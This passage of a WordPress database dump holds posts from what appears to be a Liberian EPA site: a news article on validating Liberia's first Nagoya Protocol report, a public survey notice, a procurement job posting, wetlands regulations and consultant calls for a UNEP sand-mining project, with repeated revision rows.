Nagoya Protocol is to ensure fair and equitable sharing of benefits, regulate access to genetic resources, promote transparency, and support conservation and sustainable use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Seydou noted that Liberia, as a Party to the Convention on Biological Diversity since 1995, has committed to conserving biodiversity, promoting sustainable use, and ensuring fair benefit sharing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She added that Liberia’s obligations include developing national ABS laws, establishing institutional frameworks, protecting traditional knowledge, and reporting progress to the CBD Secretariat.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She explained that the First National ABS Report assesses Liberia’s implementation efforts by reviewing laws and institutions, identifying gaps and challenges, and documenting progress made so far.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She described the report as important in measuring national progress, guiding policy and legal reforms, enhancing transparency, and mobilizing international support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Seydou also pointed out key challenges affecting implementation, including limited awareness, low technical capacity, weak coordination among institutions, and inadequate monitoring systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite these challenges, she said there are opportunities for Liberia to strengthen its legal framework, build capacity, increase community participation, and promote partnerships that will support effective implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA says inputs gathered from the validation workshop will be used to finalize the report, which will guide Liberia’s next steps in protecting biodiversity while ensuring that benefits from genetic resources reach the communities that preserve them.</p>\n<!-- /wp:paragraph -->','Liberia Validates First National Report on Nagoya Protocol as EPA Calls for Fair Benefit Sharing','','publish','open','open','','liberia-validates-first-national-report-on-nagoya-protocol-as-epa-calls-for-fair-benefit-sharing','','','2026-02-18 23:03:50','2026-02-18 23:03:50','',0,'https://ekmsliberia.info/?p=5785',26,'post','',0),(5786,38,'2026-02-18 23:02:31','2026-02-18 23:02:31','','today news','','inherit','open','closed','','today-news-2','','','2026-02-18 23:02:31','2026-02-18 23:02:31','',5785,'https://ekmsliberia.info/wp-content/uploads/2026/02/today-news-1.jpeg',0,'attachment','image/jpeg',0),(5787,38,'2026-02-18 23:03:48','2026-02-18 23:03:48','<!-- wp:paragraph -->\n<p>Paynesville City, February 18, 2026-The Environmental Protection Agency of Liberia has validated Liberia’s first National Report on the Nagoya Protocol on Access and Benefit Sharing in a move described as a major step toward protecting the country’s biodiversity and ensuring communities benefit from its use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The validation exercise was held on Wednesday, February 18, 2026, at the Liberia Learning Center in Paynesville City, bringing together government officials, environmental experts, community leaders, consultants, and development partners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the opening statement, the Executive Director of the EPA, Dr. Emmanuel King Urey Yarkpawolo, said the process marks a turning point in how Liberia manages its natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the report goes beyond documentation and reflects a national effort to ensure fairness in the use of Liberia’s rich biological and genetic resources. According to him, Liberia’s forests, wetlands, rivers, mangroves, and coastal ecosystems continue to support livelihoods, food security, and traditional medicine while also holding scientific and economic value.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo noted that for many years, countries like Liberia and local communities have not received fair recognition or benefits when their resources and traditional knowledge were used. He said the Nagoya Protocol provides the legal framework to correct this imbalance by ensuring fair and equitable sharing of benefits.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Access and Benefit Sharing is not only an environmental issue but also touches on social, economic, cultural, and governance matters, adding that it strengthens national sovereignty while promoting responsible research and investment”, He emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Executive Director said the First National Report highlights progress made, including policy development, institutional coordination, stakeholder awareness, and initial steps toward establishing systems for prior informed consent and mutually agreed terms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the same time, he acknowledged that challenges remain, including the need to finalize legal frameworks, strengthen community awareness, and build effective monitoring and compliance systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo called on all stakeholders, including government institutions, academia, the private sector, and community leaders, to work together to ensure the success of Access and Benefit Sharing in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that the process must be inclusive and based on collaboration, noting that no single institution can achieve the goals of the Nagoya Protocol alone.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Providing further background, Frances B. Seydou, Director of Intersectoral Coordination at the EPA and National Focal Point for the Nagoya Protocol, explained that the protocol is an international agreement under the Convention on Biological Diversity, adopted in 2010 in Nagoya, Japan, and entered into force in 2014.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said the agreement was developed in response to the growing global use of genetic resources and the need to ensure fairness and equity, especially for countries and communities that protect biodiversity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The protocol also recognizes national sovereignty over biological resources and seeks to protect traditional knowledge”, Mrs. Seydou added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to her, the main objective of the Nagoya Protocol is to ensure fair and equitable sharing of benefits, regulate access to genetic resources, promote transparency, and support conservation and sustainable use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Seydou noted that Liberia, as a Party to the Convention on Biological Diversity since 1995, has committed to conserving biodiversity, promoting sustainable use, and ensuring fair benefit sharing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She added that Liberia’s obligations include developing national ABS laws, establishing institutional frameworks, protecting traditional knowledge, and reporting progress to the CBD Secretariat.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She explained that the First National ABS Report assesses Liberia’s implementation efforts by reviewing laws and institutions, identifying gaps and challenges, and documenting progress made so far.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She described the report as important in measuring national progress, guiding policy and legal reforms, enhancing transparency, and mobilizing international support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Seydou also pointed out key challenges affecting implementation, including limited awareness, low technical capacity, weak coordination among institutions, and inadequate monitoring systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite these challenges, she said there are opportunities for Liberia to strengthen its legal framework, build capacity, increase community participation, and promote partnerships that will support effective implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA says inputs gathered from the validation workshop will be used to finalize the report, which will guide Liberia’s next steps in protecting biodiversity while ensuring that benefits from genetic resources reach the communities that preserve them.</p>\n<!-- /wp:paragraph -->','Liberia Validates First National Report on Nagoya Protocol as EPA Calls for Fair Benefit Sharing','','inherit','closed','closed','','5785-revision-v1','','','2026-02-18 23:03:48','2026-02-18 23:03:48','',5785,'https://ekmsliberia.info/?p=5787',0,'revision','',0),(5789,38,'2026-02-19 08:12:36','2026-02-19 08:12:36','As public officials, we serve the people, and hearing public views on our performance is essential to continuous improvement. We have therefore developed this short survey to gauge public perception of the Environmental Protection Agency under the leadership of Dr. Emmanuel K. Urey Yarkpawolo over the past two years. Kindly take just five minutes to respond to the questions. All responses are confidential, and your name is not required.\r\n\r\n&nbsp;\r\n\r\nClick to Process: <a href=\"https://surveymars.com/q/eyaRDYnXD\" target=\"_blank\" rel=\"noopener\">The Survey</a>','EPA-Two Years in Review: Public Perception Survey 2026','','publish','closed','closed','','epa-two-years-in-review-public-perception-survey-2026','','','2026-02-19 08:16:48','2026-02-19 08:16:48','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5789',15,'ekms_bulletin','',0),(5790,38,'2026-02-19 08:12:36','2026-02-19 08:12:36','As public officials, we serve the people, and hearing public views on our performance is essential to continuous improvement. We have therefore developed this short survey to gauge public perception of the Environmental Protection Agency under the leadership of Dr. Emmanuel K. Urey Yarkpawolo over the past two years. Kindly take just five minutes to respond to the questions. All responses are confidential, and your name is not required.\r\n\r\n&nbsp;\r\n\r\nClick to Process<a href=\"https://surveymars.com/q/eyaRDYnXD\" target=\"_blank\" rel=\"noopener\">Apply</a>','EPA-Two Years in Review: Public Perception Survey 2026','','inherit','closed','closed','','5789-revision-v1','','','2026-02-19 08:12:36','2026-02-19 08:12:36','',5789,'https://ekmsliberia.info/?p=5790',0,'revision','',0),(5791,38,'2026-02-19 08:15:23','2026-02-19 08:15:23','As public officials, we serve the people, and hearing public views on our performance is essential to continuous improvement. We have therefore developed this short survey to gauge public perception of the Environmental Protection Agency under the leadership of Dr. Emmanuel K. Urey Yarkpawolo over the past two years. Kindly take just five minutes to respond to the questions. All responses are confidential, and your name is not required.\n\n&nbsp;\n\nClick to Process: <a href=\"https://surveymars.com/q/eyaRDYnXD\" target=\"_blank\" rel=\"noopener\">The Survey</a>','EPA-Two Years in Review: Public Perception Survey 2026','','inherit','closed','closed','','5789-autosave-v1','','','2026-02-19 08:15:23','2026-02-19 08:15:23','',5789,'https://ekmsliberia.info/?p=5791',0,'revision','',0),(5792,38,'2026-02-19 08:15:28','2026-02-19 08:15:28','As public officials, we serve the people, and hearing public views on our performance is essential to continuous improvement. We have therefore developed this short survey to gauge public perception of the Environmental Protection Agency under the leadership of Dr. Emmanuel K. Urey Yarkpawolo over the past two years. Kindly take just five minutes to respond to the questions. All responses are confidential, and your name is not required.\r\n\r\n&nbsp;\r\n\r\nClick to Process: <a href=\"https://surveymars.com/q/eyaRDYnXD\" target=\"_blank\" rel=\"noopener\">The Survey</a>','EPA-Two Years in Review: Public Perception Survey 2026','','inherit','closed','closed','','5789-revision-v1','','','2026-02-19 08:15:28','2026-02-19 08:15:28','',5789,'https://ekmsliberia.info/?p=5792',0,'revision','',0),(5794,38,'2026-02-23 09:58:07','2026-02-23 09:58:07','','Procurement Officer-1','','inherit','open','closed','','procurement-officer-1','','','2026-02-23 09:58:07','2026-02-23 09:58:07','',0,'https://ekmsliberia.info/wp-content/uploads/2026/02/Procurement-Officer-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5795,38,'2026-02-23 09:59:44','2026-02-23 09:59:44','<h3>Background</h3>\r\n<strong> </strong>The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\n&nbsp;\r\n\r\nThe project will reduce exposure of Liberia’s communities, livelihoods, and infrastructure to climate-induced natural hazards through a well-functioning national Multi-Hazard Impact-Based Forecasting and Early Warning System (MHIBF-EWS). A well-functioning MH-IBF-EWS means having in place trained and equipped Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA), the National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings; scale-up evidence-based climate-informed decision-making, planning, and response actions countrywide. Having these in place will lead to transformative change in climate risk reduction and management in Liberia. This new paradigm will focus on translating meteorological and hydrological hazards into the sector- and location-specific potential impacts for the development of sectoral responses to mitigate those impacts <span style=\"font-family: \'TimesNewRomanPSMT\',serif;\">documents. </span>\r\n<h2 style=\"text-align: justify;\"><strong><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',serif; letter-spacing: -.1pt;\">Objective</span></strong></h2>\r\n<p style=\"text-align: justify; background: white;\"><span style=\"font-family: \'TimesNewRomanPSMT\',serif;\">The objective of the assignment is to improve the institutional capacity of the CIS Project through the development, upgrade and reform of systems vital for improved service delivery. The aim is to strengthen the CIS Project planning and coordination capacity by ensuring timely procurement of works, goods and services in accordance with the PPCC and Bank’s procurement rules and procedures.</span></p>\r\nClick to<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/02/Procurement-Officer-1.docx\" target=\"_blank\" rel=\"noopener\">aply</a>','Procurement Officer','','inherit','closed','closed','','5793-revision-v1','','','2026-02-23 09:59:44','2026-02-23 09:59:44','',5793,'https://ekmsliberia.info/?p=5795',0,'revision','',0),(5824,38,'2026-03-17 12:22:23','2026-03-17 12:22:23','<strong>INTRODUCTION </strong>\r\n\r\nLiberia contains wetlands that provide basic ecosystem services and offer a wide range of functions that benefit primary industries such as forestry, fisheries, agriculture and ecotourism that are essential for the livelihood of human beings and sustenance of other living things. The coming into being of the Environmental Protection Agency (EPA) created the opportunity to prepare a National Wetlands Policy in 2014 based on the National Environmental Policy of Liberia and the Environmental Management Act. The EPA Act promulgates a framework legislation, which provides the mandate of these standards, guidelines and procedures for wetland protection, based on the National Wetlands Policy to ensure sustainable management of wetland resources and the environment in Liberia. The Environmental Protection Agency of Liberia is the custodian of quality assurance of Liberia’s wetlands resources. Part of its responsibilities is to ensure that the quality of Liberia’s wetland resources remains fit for sustainable use and that the livelihood of both human and the ecosystems are maintained and protected. These aspirations are achieved through effective management of wetland resources.\r\n\r\nThe establishment of a regulatory instrument is a first step towards a transformative progress in achieving the goals of improving access, management and sustainable use of wetlands in Liberia. This regulatory instrument is consistent with Part VI Sections 74 and 75 of the Environment Protection and Management Law of Liberia 2003.','WETLANDS MANAGEMENT REGULATIONS, 2024','','publish','closed','closed','','wetlands-management-regulations-2024','','','2026-03-17 12:22:58','2026-03-17 12:22:58','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5824',10,'document','',0),(5800,38,'2026-03-09 08:06:11','2026-03-09 08:06:11','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n&nbsp;\r\n\r\nClick to:','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Economic and Market Expert','','inherit','closed','closed','','5799-revision-v1','','','2026-03-09 08:06:11','2026-03-09 08:06:11','',5799,'https://ekmsliberia.info/?p=5800',0,'revision','',0),(5801,38,'2026-03-09 08:06:32','2026-03-09 08:06:32','','Economic and Market Expert','','inherit','open','closed','','economic-and-market-expert','','','2026-03-09 08:06:32','2026-03-09 08:06:32','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Economic-and-Market-Expert.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5802,38,'2026-03-09 08:07:27','2026-03-09 08:07:27','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Economic-and-Market-Expert.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Economic and Market Expert','','inherit','closed','closed','','5799-revision-v1','','','2026-03-09 08:07:27','2026-03-09 08:07:27','',5799,'https://ekmsliberia.info/?p=5802',0,'revision','',0),(5803,38,'2026-03-05 08:19:30','2026-03-05 08:19:30','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Institutional-Expert.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Call for Expression of Interest to provide Short- Term Consultancy/Technical Support: National Consultant – Institutional Expert','','publish','closed','closed','','call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-national-consultant-institutional-expert','','','2026-03-09 20:02:09','2026-03-09 20:02:09','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5803',12,'ekms_bulletin','',0),(5804,38,'2026-03-09 08:16:26','2026-03-09 08:16:26','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\nClick to:\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Call for Expression of Interest to provide Short- Term Consultancy/Technical Support: National Consultant – Institutional Expert','','inherit','closed','closed','','5803-revision-v1','','','2026-03-09 08:16:26','2026-03-09 08:16:26','',5803,'https://ekmsliberia.info/?p=5804',0,'revision','',0),(5805,38,'2026-03-09 08:18:25','2026-03-09 08:18:25','','Institutional Expert','','inherit','open','closed','','institutional-expert','','','2026-03-09 08:18:25','2026-03-09 08:18:25','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Institutional-Expert.pdf',0,'attachment','application/pdf',0),(5806,38,'2026-03-09 08:19:30','2026-03-09 08:19:30','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Institutional-Expert.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Call for Expression of Interest to provide Short- Term Consultancy/Technical Support: National Consultant – Institutional Expert','','inherit','closed','closed','','5803-revision-v1','','','2026-03-09 08:19:30','2026-03-09 08:19:30','',5803,'https://ekmsliberia.info/?p=5806',0,'revision','',0),(5807,38,'2026-03-05 08:27:50','2026-03-05 08:27:50','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\nClick to: <a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Environmental-Expert.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>','Call for Expression of Interest to provide Short- Term Consultancy/Technical Support: National Consultant – Environmental Expert','','publish','closed','closed','','call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-national-consultant-environmental-expert','','','2026-03-09 20:01:22','2026-03-09 20:01:22','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5807',11,'ekms_bulletin','',0),(5808,38,'2026-03-09 08:25:32','2026-03-09 08:25:32','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\nClick to:\r\n\r\n</div>','Call for Expression of Interest to provide Short- Term Consultancy/Technical Support: National Consultant – Environmental Expert','','inherit','closed','closed','','5807-revision-v1','','','2026-03-09 08:25:32','2026-03-09 08:25:32','',5807,'https://ekmsliberia.info/?p=5808',0,'revision','',0),(5809,38,'2026-03-09 08:26:06','2026-03-09 08:26:06','','Environmental Expert','','inherit','open','closed','','environmental-expert','','','2026-03-09 08:26:06','2026-03-09 08:26:06','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Environmental-Expert.pdf',0,'attachment','application/pdf',0),(5810,38,'2026-03-09 08:27:50','2026-03-09 08:27:50','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\nClick to: <a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Environmental-Expert.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>','Call for Expression of Interest to provide Short- Term Consultancy/Technical Support: National Consultant – Environmental Expert','','inherit','closed','closed','','5807-revision-v1','','','2026-03-09 08:27:50','2026-03-09 